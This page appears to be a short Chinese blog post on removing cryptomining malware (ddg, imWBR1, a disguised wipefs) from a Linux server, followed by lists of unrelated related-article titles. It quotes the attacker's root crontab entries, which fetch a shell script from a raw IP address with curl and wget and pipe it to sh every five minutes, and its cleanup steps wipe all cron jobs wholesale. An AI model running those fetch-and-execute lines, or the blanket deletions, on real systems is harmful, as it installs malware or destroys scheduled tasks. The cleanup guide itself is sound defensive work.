Linux 命令

估计这两个是定时下载病毒程序的任务

# cat  /var/spool/cron/crontabs/root

*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh

*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

# rm -fr  /var/spool/cron/

# ps -aux|grep ddg

root      1565  0.0  0.3 198580  5832 ?        Sl   Mar27   0:48 /tmp/ddg.3001

root     31956  0.0  0.0 112660   976 pts/2    S+   09:40   0:00 grep --color=auto ddg

# kill -9 1565

ps -aux|grep imWBR1

root     31697  0.4  1.3 319948 25936 ?        Ssl  09:15   0:07 /tmp/imWBR1

root     31970  0.0  0.0 112660   976 pts/2    S+   09:41   0:00 grep --color=auto imWBR1

# kill -9 31697

# rm -f /tmp/ddg.*

# rm -rf /tmp/imWBR1

# cat /etc/crontab

看到这个wipefs的定时任务,wipefs本来是正常的,但是top看wipefs占cpu很大,所以是挖坑伪装的

0 */6 * * * root /bin/wipefs

# echo "" > /etc/crontab

linux下imwbr1进程,清除挖矿程序(imWBR1,ddg,wipefs),亲测可用相关推荐

  1. ubuntu下 teamviewer的安装方法(超简单,亲测可用)

    ubuntu下 teamviewer的安装方法(超简单,亲测可用) 1.去官网下载安装包 官网链接:https://www.teamviewer.com/zhcn/download/linux/ 点击 ...

  2. 从零开始的Linux 802.11WiFi CSITool(AP和monitor模式均亲测可用)

    从零开始的Linux WiFi CSITool(AP和monitor模式均亲测可用) 主要参考 1.官方资料: 2.亲测可用安装教程: 零.Linux及CSI相关知识的学习 1.Linux相关 1.1 ...

  3. python 程序开机自启动,亲测可用

    我们公司的采用的谷歌的云机器,如果机器里由显卡,那么这台机器会每隔一段时间会重启重启后会导致任务挂掉,对于布置的在机器上的服务需要设置开机自启动. 这个是开机就启动python 程序 在 /lib/s ...

  4. Windows和VM下的Ubuntu虚拟系统之间相互复制粘贴(亲测可用)

    文章目录 一.问题 二.解决思路 三.解决方法 一.问题 Windows和VM下的Ubuntu虚拟系统之间相互复制粘贴 二.解决思路 两个系统之间不能直接粘贴复制,安装辅助工具即可. 三.解决方法 s ...

  5. 2022最新wifi大师,wifi分销小程序源码,亲测可用

    话不多说,直接上干货 微信搜索,wifi鑫速连,就可以获得源码和解压密码

  6. 微信小程序码的生成(JAVA完整版) 亲测可用

    JAVA生成小程序码(太阳码) 首先准备工具类,这里我使用的是QrUtil;废话不多说,上工具类; 工具类是获取token使用; appid = 小程序appID secret = 小程序秘钥 /** ...

  7. linux 查看进程变量,Linux下查看进程(程序)启动时的环境变量

    Linux下查看进程(程序)启动时的环境变量 Linux的pargs ==================================== 今天又遇到一个老问题: 同事遇到了sqlplus &qu ...

  8. linux环境下查看进程,Linux下查看进程(程序)启动时的环境变量

    背景: 因最近试安装Linux下的jira,有一个中文插件安装后,一旦设置开机启动后,它是英文,而在终端再重新启动一次后呢,似乎插件生效,它又恢复为正常中文界面,我首先想这这涉及到一个环境变量的问题, ...

  9. 阿里云ECS遭挖矿程序攻击解决方法(彻底清除挖矿程序,顺便下载了挖矿程序的脚本)

    一:杀死挖矿程序进程 在服务器上使用top指令查看cpu的使用情况,发现有一个叫java的程序占用cpu高达99.9% PID USER PR NI VIRT RES SHR S %CPU %MEM ...

  10. linux 下得到进程的启动时间

    linux 下得到进程的启动时间! 运行方式:./pstart 进程号 " 如: ./pstart 1 #!/bin/bash pid=$1 if [ "$pid" == ...

最新文章

  1. python set过滤
  2. nodejs 的序列化与反序列化
  3. Hibernate中的一段批量插入功能的代码
  4. 【计算机基础】 Virtual memory 虚拟内存
  5. TVM:使用Tensor Expression (TE)来处理算子
  6. hibernate基本类型映射
  7. CentOS_Oracle Enterprise Manager 11g 页面中文无法显示
  8. Node-webpack基本使用和详细案例
  9. java -jar bat_java jar包和bat批处理命令
  10. dedecms采集侠问题
  11. mysql删除表数据恢复
  12. 惩罚函数法迭代过程的本质及其他最优化方法中的一些概念
  13. Springboot 基于微信小程序的高校学生疫情在校封闭管理系统的设计与实现 毕业设计-附源码240904
  14. 愿天下有情人都是失散多年的兄妹
  15. 第一章 VSTO简介
  16. caj格式的文件如何转换成Word文档?
  17. 编译原理 子集构造法实现
  18. python列表同时添加多个元素_python怎么向列表中添加多个元素
  19. 途志传媒:直播电商如何维护消费者权益?抖音推出安心购
  20. 数据结构与算法一览(树、图、排序算法、搜索算法等)- Review

热门文章

  1. 超级牛的网站同步工具软件—端端Clouduolc
  2. 软考高项 : (27)信息系统项目管理师模拟试题
  3. 电视盒机顶盒搭建FTP功能,外接硬盘U盘,电脑或手机端访问
  4. Java实现 LeetCode 506 相对名次
  5. UE学习笔记:源码安装UE
  6. Java如何调用芝麻信用分?
  7. 手机HTML5 audio 无法自动播放下一首
  8. 华硕主板怎么进入bios
  9. 今日头条视频采集方法
  10. android ios9 rom,谁说安卓不如苹果?看Android7.0如何逆袭iOS9.3